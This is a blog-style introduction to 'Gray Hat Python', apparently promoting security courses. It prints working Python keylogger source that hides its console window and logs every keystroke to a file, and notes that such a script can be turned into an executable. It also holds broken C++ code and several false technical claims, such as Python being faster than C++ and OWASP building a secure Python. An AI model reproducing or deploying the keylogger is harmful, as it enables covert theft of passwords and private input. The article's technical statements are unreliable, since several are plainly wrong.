Introduction to Gray Hat Python
So, two years back, I was doing my research on programming languages; I started reading about C, C++, Assembly, Python and Ruby. I wanted to become an expert in Cyber Security. So, I started learning as much as I can. I started with C, C++ and C# being the basics, and after learning and compiling lots of programs and viruses, I finally started learning Kali Linux. It is an operating system for penetration testing for those who don’t know what Kali Linux is. So, I was going on with my studies and what I saw was that most of the programs, viruses and Trojans were compiled in Python, and their base being Ruby.
So, I stopped my studies for the time being and started learning Python or, being precise Gray Hat Python and tadaa… It was extremely easy when compared to C, C# or any other language I learnt. I finally came to know why Python was the most used language and how it became famous.
Today, I would be discussing how Python transformed into Gray Hat Python and why it is so extensively used that even Google and YouTube use it in their database to give as accurate search results as possible.
Starting off, Python is a high-level programming language, which means its syntaxes are extremely easy to read, even for beginners. If you are new to programming, this would be the language I would suggest you to start with. Let me give you an example:
How does it look in Different Programming Languages?
Explanation using different programming languages as below:
This is how it looks in C
#include
int main()
{
printf("Hello world\n");
return 0;
}This is how it looks in Java
class HelloWorld
{
public static void main (String args[])
{
System.out.println ("Hello World");
}
}This is how it looks like in Python(v2.7)
print "Hello World" Simple? Yes, it is. So, Python was not only easy to write and understand but also very compact. So, you might be wondering how did this lead to Gray Hat Python?
Python vs Gray Hat Python
So, what exactly is Gray Hat Python? Why is it so different from our normal Python? The thing is, Gray Hat Python is nothing but programs written in Python by Hackers, Network-Stress testers and Reverse Engineers to create or crack a program. But the term Gray Hat is used because it is not exactly a beneficial or user software. It’s used to Secure or create security-breaking software.
It can easily be used to test the limitations of a secure environment or break into a secure environment. That’s what Gray Hat means. And it’s far easier to do it in Python rather than doing it in C, C++ or java. Thus the name Gray Hat Python. Few examples I can think of are:
• Writing key-loggers (for Hackers and Pentesters)
• Writing Security Shell Scripts (For Network Administrators)
• Writing an Automated IDS (Intrusion Detection System for Security Engineers)
So, now you know why and how Gray Hat Python is useful. To elaborate on this, let me give you some detailed examples.
You may have heard of Google App Engine. Google App Engine was originally designed in Python before it was ported on. Google App is a proper example of a program written in Python because it allows building web applications using its high-end rich collection of libraries, tools and framework.
Ever wondered why is it so easy to search for something in Google? Most of the time, you get search results that are 80% accurate. This is because Python is extremely flexible, works at high speed, and the databases are much more compact though it stores ‘n’ number of information. Python is so extensible that even YouTube uses it for purposes like viewing the video, controlling templates, administer video, access to canonical data, and many more.
Google has its crawlers and spiders, which gather data as soon as it is uploaded on the web, no matter where or how secure it is. One just needs proper inspiration, time and knowledge to gather this information.
Google searches were previously based on Python, which it later changed to C++ for speed optimization because Google crawlers crawl many pages per second and each of them take few minutes to successfully crawl. Python, at present, is much faster than C++, but that wasn’t the same case a few decades ago.
There was a famous Quote quoted by Google: –
“Python where we can, C++ where we must.”
So, you might be wondering how can this be used for Hacking, Pentesting and Network Security. I beg to differ. If you could create a program that is 70%-80% accurate in giving efficient search results, then you can probably build an application that can connect websites, search smartly and build a profile of a person, which Individual Black Hats can rather use for malicious purposes. Leave Individuals aside; one is smart enough and can easily build an application for building a company’s profile, its whole tree from its root to whatever you can think of…
Information Gathering via Maltego
You may be thinking that I am exaggerating a bit. Nope, I am NOT!
Think of examples like Maltego. Maltego is software, or I can better re-phrase it as an open-source forensics application built to gather information and building profile of people, company, and other corporate agencies.
One just needs to enter proper data into the app, and the rest of things like linking emails, people, group of people, even determining internet infrastructures such as Domains, DNS names, Netblocks and IP addresses can be linked and interconnected using this open-source intelligence.
For more information, visit to know What is Maltego?
So, if access to “Secret information” determines your success, then Maltego can help you discover it. Maltego is partially written in Python and uses Java as well, which is again a great language.
So much to quote about security from Google. To be more precise, Google is the least way you can keep yourself anonymous on the web, doesn’t matter whether you use incognito or www.duckduckgo.com from chrome. Because ultimately, everything is updated on the web. The point being here is, it’s not about invulnerability; it’s about being absolute vulnerable. One cannot completely wipe oneself completely off the Internet. But one can surely try to keep as little info on the Web as possible.
Python is not just a language; it’s a scripting language. Scripting languages allow you to write, modify your own tools when you need something more custom. These Network Security tools depend on scripting language heavily for extensibility. For Example, let’s Take Scapy.
Scapy is purely written in Python. It is a powerful interactive packet manipulation tool. It can generate fake packets on its own, scan networks, and even sniff packets.
Find detailed information about What is Scapy?
Now, these are complex programs written by advanced programmers. Let’s see how simple it is to write a program in Python that can be easily understood by people who have some good basics in programming.
How has keylogger written in Python?
Following is a code for keylogger written in python:
#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window,0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file,"a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)
proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input So, this is far more than easy if you ask me. I have just simply added the modules pyhook, Pythoncom, win32gui and win32console, which you can easily download from the sourceforge website, and I have mentioned the comments using the hashtag. But if I have to write the same program in C++, let’s see how hard can that be.
This is a program written in C++.
#include
#include
#include
#include
int main(int argc, char ** agrv){
using namepace std; /*Easier*/
char std::vector input_STRUCT = ["S", "T", "O"];
char std::vector input_STRUCT_1 = ["P", ""];
char std::vector input_STRUCT_2 = ["L", "O", "O", "K", "I", "N", "G"];
char std::vector input_STRUCT_3 = ["", "F", "O", "R"];
char std::vector input_STRUCT_4 = ["M", "A", "L", "W"];
char std::vector input_STRUCT_5 = ["A", "R", "E"];
ostream os("C:\users\keylogger.txt");
int i;
for( i = 0; i <=2; i++){
os << input_STRUCT[i];
for(;i <= 1000000 ;i++){
}
}
for( i=0; i<=1;i++){
os << input_STRING_1[i];
for(;i <= 1000000 ;i++){
}
}
for(i=0; i<=6; i++) {
os << input_STRING_2 [i];
for(; i <= 1000000 ; i++){
}
for(i=0; i<=3;i++){
os << input_STRING_3[i];
for(; i <= 1000000 ;i++){
}
}
for(i=0; i<=3; i++){
os << input_STRING_4[i];
for(;i <= 1000000 ; i++){
}
}
for(i=0; i<=2; i++){
os << input_STRING_5[i];
for(;i <= 1000000 ; i++){
}
}
os.close();
istream is (" C:\users\keylogger.txt ");
cout << is;
return 0;
} So, this is pretty large as compared to Python. And if we talk about efficiency, then Python can be easily compiled into an executable without any effort using py2exe software. Whereas if I talk about C++, then, frankly speaking, this code is a joke. To write a proper key logger, one needs to write a DLL which implements the WH_KEYBOARD hook. Besides, this code is far away from being easy for a beginner to understand.
Open Source Hacking
Now, this takes care of Black Hat hackers, which, to be more precise, are the people who intend to destroy, manipulate data for their own needs. Talking from the view of security concern, Python is also useful for White Hat hackers who intend to save society from malicious hackers’ attack. If you want to develop a career or at least want to learn Python for security research, then you can surely get in deep with OWASP, BRO or Quick NIX Secure Script.
OWASP is an Open Web Application Security Project. OWASP aims to create a more secure version of Python that makes it easier for security professionals and developers to write software less prone to hackers’ attack. It is related to Black-Box analysis, identifying and addressing security-related issues that can affect Python’s interactive interpreter.
BRO is a network security and traffic monitor program, whereas Quick NIX is used to harden and secure file ownerships on the fly.
Since we are speaking of Security, let’s talk about an operating system that is partially based on Python. Python works great with UNIX, LINUX and Debian. One of the most famous operating systems was Backtrack 5. There were different versions released. It was specifically designed for PenTesting. Later on, the people at Offensive Security thought that Backtrack needed a reboot ‘cause most of the tools were either not working properly or were not supported.
Later on, they released Kali Linux, which was totally based on Debian. And most of its framework is either in Ruby or Python. Ruby, too is an awesome scripting language. But I would anytime prefer Python over that, the reason being Python has a more diverse community with Linux, and it’s more direct and easy to debug. Whereas Ruby has tons of features and is quick to adapt to its surrounding environment, it can be hard to debug, hard to read, and more sophisticated than Python.
The best example would be like comparing Apple vs Linux or Comparing iphone vs Android. Apple is rich in resource and is extremely smooth, and is more biased towards beginners. Whereas Linux/Android is more User-friendly, a bit laggy and can be a headache sometimes if you don’t know how to configure or maintain it.
There is even a book based on Python Gray Hat Hacking by Justin Seitz. It deals specifically with automating tedious reverse engineering and security-related tasks, designing your own debugger, library and DLL injection, sniffing secure traffic over an encrypted session and using Immunity debugger, Sulley and many more. It’s an awesome book; it doesn’t matter whether you are a beginner or you are an expert; you will always learn some or the other thing every time you read it.
Conclusion
So, if you are a beginner, Python would be the right choice for you to start with as your first programming security testing language.
Just remember one thing in the end, Gray Hat Python is not just a language; it’s a way to do things in a proper and fast manner.
Related Articles
Here are some articles that will help you to get more detail about the Gray Hat Python, so just go through the link.
- Benefits Of Cyber security Tools You Must be Aware of
- Careers in Python
- Top 25 Amazing Python Interview Questions And Answers
- What are the Benefits and Limitations of Using Python?
- Python vs Node.js
- Guide to Cyber Security Interview Questions
- Different Types of Tools For Security Testing
40 Online Courses | 13 Hands-on Projects | 215+ Hours | Verifiable Certificate of Completion
4.8
View Course
Related Courses
